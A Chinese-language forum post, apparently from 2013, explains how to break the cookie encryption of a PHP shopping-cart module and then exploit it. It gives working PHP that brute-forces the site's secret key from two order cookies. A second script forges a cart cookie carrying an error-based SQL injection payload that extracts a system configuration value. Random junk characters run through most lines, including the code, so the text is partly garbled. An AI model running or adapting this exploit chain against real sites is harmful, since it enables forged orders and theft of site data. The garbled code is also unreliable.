www.xxx.com/plus/search.php?keyword= [+ Q% ~; Z3 E7 e0 U8 E
在 include/shopcar.class.php中
& A" T9 h+ g" G) @+ O4 T( w5 m先看一下这个shopcar类是如何生成cookie的* { g: G+ Q) s! x6 }* t; o% i1 Z' }
239 function saveCookie($key,$value). [% D1 Y4 e9 J3 q+ ?3 A% W
240 {
@) r" x- s4 n5 {0 c241 if(is_array($value))
% r+ J2 T0 {) R1 I5 x242 { Q( f2 y0 C1 n! [
243 $value = $this->enCrypt($this->enCode($value));
1 @5 y. P2 \3 K1 v/ E v9 _4 P& a244 }# L2 K' R# R- D& P/ z* k9 ~( R
245 else
$ c9 x& O y( f9 e2 x* r# |; C246 {
j, V. m, f# Z247 $value = $this->enCrypt($value);
, I8 Z4 b m% Z, Y5 i248 }
5 J) A1 k7 F. \249 setcookie($key,$value,time()+36000,’/');% [% n% U$ K9 X* f u; W& I
250 }
) U; \5 Z- S) T+ k- v% {5 T简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
+ `3 F$ o; ~+ }- H, d2 R+ |186 function enCrypt($txt)
) [$ q. ~/ x! }5 o# k- J- F# e187 {) n# q1 i9 Q/ h8 u u$ L
188 srand((double)microtime() * 1000000);% F) t/ J6 E( g5 E
189 $encrypt_key = md5(rand(0, 32000));
$ j* h4 O# @" m* U1 ]+ E190 $ctr = 0;4 L( m4 c/ |, V! F
191 $tmp = ”;
8 I2 B" p; T1 E192 for($i = 0; $i < strlen($txt); $i++)- U9 a7 V$ d* O3 D$ k }; m
193 {
2 d' |3 [7 D7 X8 S7 S5 Y194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; J: D& x. z" p. u) _) h
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);. [4 i+ K2 D9 G) `/ o
196 }
5 M$ h8 r9 O2 X0 D! J197 return base64_encode($this->setKey($tmp));
+ U- w/ S9 M5 {$ `/ y6 k# t/ Q. Z- e& a198 }
1 t* D* x- S) x8 o213 function setKey($txt)5 c4 F* p: m9 t2 R8 y5 U5 q
214 {
/ K/ t' K3 M2 J0 |215 global $cfg_cookie_encode;
% y1 X" O+ a( e5 U/ s216 $encrypt_key = md5(strtolower($cfg_cookie_encode));* v7 P4 W# ~+ R+ L X6 M. C( c
217 $ctr = 0;
7 _6 T: l2 F6 f" R( J218 $tmp = ”;
B$ [' d+ ?0 M) R; i+ a* S219 for($i = 0; $i < strlen($txt); $i++)
: {1 I/ |1 w2 h1 B- b220 {
4 e1 w6 }# s2 |0 t221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, J9 G+ R9 \2 x9 b2 a5 h
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];4 ]8 ]. W4 r# h. f% R. F
223 }
3 v2 |" z$ F/ u( z. n2 R224 return $tmp;
2 d1 F7 p$ u" |" f8 Y- O+ i225 }% l2 S5 B$ s7 O5 x0 h' l4 ~ L
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的$ q" O. |! ]6 O& r3 q$ X
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。1 e9 Y3 v# L( c" k! a9 j3 ~" @) |
具体代码如下:
" E. v$ a4 B: [/ g/ b+ }, A<?php- q8 R5 p1 t- T0 c1 o8 ]- B
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
# w& l0 t, w0 |9 ? Q8 c* B$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
6 j; T% @2 |" Z( w$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here( \* A% ~: W/ x( D! X
function reStrCode($code,$string)
- `4 a1 B) t( R. Y. I$ {, T- u- Z{& b; M) k$ i" e7 ?, q+ Z$ l
$code = base64_decode($code);& j2 n; q K# E+ A
$key = “”;
# C/ Y$ y3 s$ x( p9 _: Dfor($i=0 ; $i<32 ; $i++)
1 w9 _+ f7 B: U) F{
f0 b4 B/ o/ m4 x$key .= $string[$i] ^ $code[$i];
% ^: `( O, |* ^2 x0 `}) d9 o4 N2 G9 }* ~) l2 B( y( A
return $key;
3 e& v$ V- H; A6 n}( }4 S/ [7 A" q$ j8 Z1 `: M4 A
function getKeys($cookie,$plantxt); I: x% r# l0 ~0 Z
{
; v- P8 G4 _ \# x5 n8 m$tmp = $cookie;! n% B2 C6 Q o" W
$results = array();5 T9 p- A4 Y0 M: F {
for($j=0 ; $j < 32000; $j++)
7 B7 b a* `% Q. j2 i) L) t{/ M/ u V, G0 A$ Y9 R2 [. ^- l5 t
& T/ O: ]' M: @! M( n
$txt = $plantxt;
% S4 k Y$ e& E. u S s$ctr = 0;
1 `2 V" b# I, K2 ]( z/ y$tmp = ”;/ L$ U) N- H, D: N) S7 l- D9 s
$encrypt_key = md5($j);$ y8 d/ b! ]& I& b* D0 a3 e
for($i =0; $i < strlen($txt); $i ++)3 l8 l- Q4 J4 h, H- [
{
. Z- }- i% L# O6 L' N2 l$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( X! @ O& \+ R; @$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);: p; f4 h* h/ `5 f. `
}
2 |8 Q8 ^/ A7 h8 y$string = $tmp;
1 w/ `$ [$ w4 y5 j8 b7 P, o8 U$code = $cookie;4 Z B( X5 V' p& k ~
$result = reStrCode($code,$string);
+ K" p0 R- j* g$ D( l ^6 ^* e( _if(eregi(‘^[a-z0-9]+$’,$result))
$ g% Y6 [) B! p1 d+ {/ n2 C6 y{9 I8 x* { B/ W' g1 N! t
echo $result.”\n”;1 o1 y5 X( G8 d7 ^) C
$results[] = $result;
! ?# ]- F$ j& O, M}
# K. J, n; X' ?- {6 J}
% z: M" }6 v( s& H3 M8 d4 _- _return $results;
* q( z% y4 Y& u* k& S" f}
5 y8 {) [' l5 w) |$results1 = getKeys($cookie1,$plantxt);
9 w9 Z( ]: h4 u4 g$results2 = getKeys($cookie2,$plantxt);
: K4 u( \) b' i; Vprint “\n——————–real key————————–\n”;
- _. a7 d/ f; @9 n& Mforeach($results1 as $test1)) D' X- G4 D/ R( U% F
{1 N+ [4 {7 K( f& W& q+ ^. X) V
foreach($results2 as $test2)& s# H1 ?' ]9 w6 I8 c1 _
{# t3 _9 c5 c+ x1 E; U+ g
if($test1 == $test2): R0 w& Q5 H9 _+ U6 E( Z
{: j7 J* `& Q( X7 Z7 {1 t
echo $test1.”\n”;
- }7 f& t1 R5 h8 [6 d1 l- \}
' @5 O t' B2 P' L$ o% ?8 h P' E}
0 [: K0 s1 t' p1 x+ F}3 p3 M+ _. `% B- U6 {1 {
?>
7 D7 z& ]1 }$ P) Gcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
, v7 y! ^$ B, L# Kplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
1 U% Y' r7 }5 ^' [然后推算出md5(strtolower($cfg_cookie_encode))1 o' K* k9 G" ?& M7 u, b7 W
得到这个key之后,我们就可以构造任意购物车的cookie
. H1 Z$ Y6 o; R! j% v接着看
) r. l T% A& h) R20 class MemberShops
1 O5 Q" F! G" {0 C, o6 W21 {
8 ?/ E1 V4 C. d- T5 b22 var $OrdersId;
3 d! A. c6 O- h23 var $productsId;
" G: g* E3 f. O# Z8 L) H8 v. e24
- F9 `9 s, ?# W9 l; i, q$ E* W25 function __construct()8 a. {2 |% P2 X( q/ _
26 {
4 ?! S: i' S! |. t; ^8 I, ?/ B27 $this->OrdersId = $this->getCookie(“OrdersId”);
7 w; A0 e3 L, M# d: \28 if(empty($this->OrdersId))
; G) C4 A& C. d' E" L29 {
) _" q; `( W& V( s. Y30 $this->OrdersId = $this->MakeOrders();
; m0 r/ N- U% C' Y$ S9 H2 y) T31 }
$ G# p' q# |; t- O' l2 P7 o32 }
" ^5 B2 {, q3 v发现OrderId是从cookie里面获取的
4 E5 b2 z+ ~; m3 O然后6 J' L2 p F, Z, P* L% g. y& e5 m' X
/plus/carbuyaction.php中的$ H! _4 @6 v/ A2 ~
29 $cart = new MemberShops();6 e& P5 d1 H; A% w
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
+ I; S8 J4 p8 P, ], r! F7 j……$ `5 i" f |0 Z6 p+ n/ F4 _0 ?( K# Y
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);1 E% y; F( e- f* M2 }! C: ]
接着我们就可以注入了: R9 g, p0 s" o2 l6 W8 C" |
通过利用下面代码生成cookie:: U9 a, E0 Q6 Q' O! M N4 V
<?php2 z4 T# t% Q* b- y% ^' E
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
* K; |: B' e5 l/ A! D1 ^. d$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here1 c- [# J, F7 {* H
function setKey($txt)' ?4 K. @' ?! T
{$ a8 l1 i+ a# o# C \
global $encrypt_key;
5 d4 v4 Z2 t; G* N. z% G9 E$ctr = 0;
+ n; j' q( \8 s2 n4 A$tmp = ”;% ]& w- L, H7 ]. E. ?
for($i = 0; $i < strlen($txt); $i++)2 P" i! w( ?3 v: J% e
{
5 r- C& [& H) L# }6 T/ Q, N$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
; e) ?# ]4 ~, g1 a$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
, D) ~' h; c% f) F9 f( i}
4 D% b* i/ S. H# Ereturn $tmp;
* m! }; c, L+ g+ S. W0 z- ?) `}
. q. L p; J% S( z, |$ Efunction enCrypt($txt)
5 C; L3 k' m- t- K+ d. i6 o{
; l, e: V3 H8 o! @srand((double)microtime() * 1000000);
; M- p8 H2 h3 F5 e. O' }. ?. h# M: K$encrypt_key = md5(rand(0, 32000));
4 J) e4 K: s7 x8 U+ @4 A: {. M$ctr = 0;1 x$ c+ P9 s& z* Y3 C- j$ T J1 h
$tmp = ”;: e; e% N) a. }0 {& v2 U: V
for($i = 0; $i < strlen($txt); $i++)0 P. J9 h: n* |4 n9 T! h4 s; v
{
) Z: I" O6 u3 f1 k6 z5 S$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;8 o. \ _3 Y) u+ Q3 _2 B5 h4 o
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);! }+ q! ]' T2 a9 b3 Y
}, @/ o9 t, G, y* P
return base64_encode(setKey($tmp));
1 y; H, A. w% ~, ]. q% c3 e}3 y4 u0 [& j9 o1 }0 P
for($dest =0;$dest = enCrypt($txt);)
! d0 O& x, O/ C. \& I5 O{, O. L2 _, d$ w/ o, M$ ~
if(!strpos($dest,’+'))2 @( s& c! `, U; M2 X6 s2 C: |- M
{
, T( }% \3 [" v, c$ u, A8 O( h; gbreak;
# u6 _2 r' u" W0 q& _}
/ C( s" b. ~& D$ z/ [/ k; X( ~/ q}% I: }( l. X( j- R/ H" q
echo $dest.”\n”;. S" @% l6 q0 V0 p: D1 h
?>
" y* k# p" Q9 Y5 G0 ~ j
* _& V9 B5 H, \; ?1 [9 T |
发表于 2013-2-13 23:58:29
收藏
支持
反对